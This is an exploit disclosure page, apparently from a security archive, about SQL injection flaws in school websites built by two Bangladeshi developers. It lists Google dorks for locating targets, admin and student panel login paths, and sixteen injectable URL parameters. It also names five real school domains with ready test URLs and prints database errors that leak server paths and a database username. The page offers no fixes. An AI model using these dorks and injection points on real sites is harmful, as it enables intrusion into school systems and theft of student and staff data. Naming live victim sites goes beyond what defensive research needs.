Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability

2019.01.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################### # Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 08/01/2019 # Vendor Homepage : softitsecurity.com ~ hululuit.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html ############################################################### Admin/Teacher/Student Panel Login Path => /adminoperation/ /teacheroperation/ /studentoperation/ # SQL Injection Exploits : ********************** /?v=home.jsp&id=[SQL Injection] /?v=administrationdeatils.jsp&id=[SQL Injection] /?v=allteacher.jsp&id=[SQL Injection] /?v=allclark.jsp&id=[SQL Injection] /?v=talentstudent-detail.jsp&id=[SQL Injection] /?v=allstudent.jsp&id=[SQL Injection] /?v=boardresultdetails.jsp&id=1%27 /?v=universitydetails.jsp&id=[SQL Injection] /?v=talentteacher-detail.jsp&id=[SQL Injection] /?v=academiccalender-details.jsp&id=[SQL Injection] /?v=allevent.jsp&id=[SQL Injection] /?v=allresult.jsp&id=[SQL Injection] /?v=noticebord-detail.jsp&id=[SQL Injection] /?v=uploadbook-details.jsp&id=[SQL Injection] /?v=usefulllinkdetails.jsp&id=[SQL Injection] /?v=checkclass.jsp&id=[SQL Injection] ############################################################### # Example Vulnerable Sites => *************************** Note : (192.185.94.62) => There are 182 domains hosted on this server. [+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27 [+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27 [+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27 [+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27 [+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27 ############################################################### # SQL Database Error : ********************* Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali /public_html/DAL/DbConnect.php on line 8 Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost' (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8 Warning: fread(): Length parameter must be greater than 0 in /home/haripuralimmadra/public_html/controller/function.php on line 220 ############################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###############################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top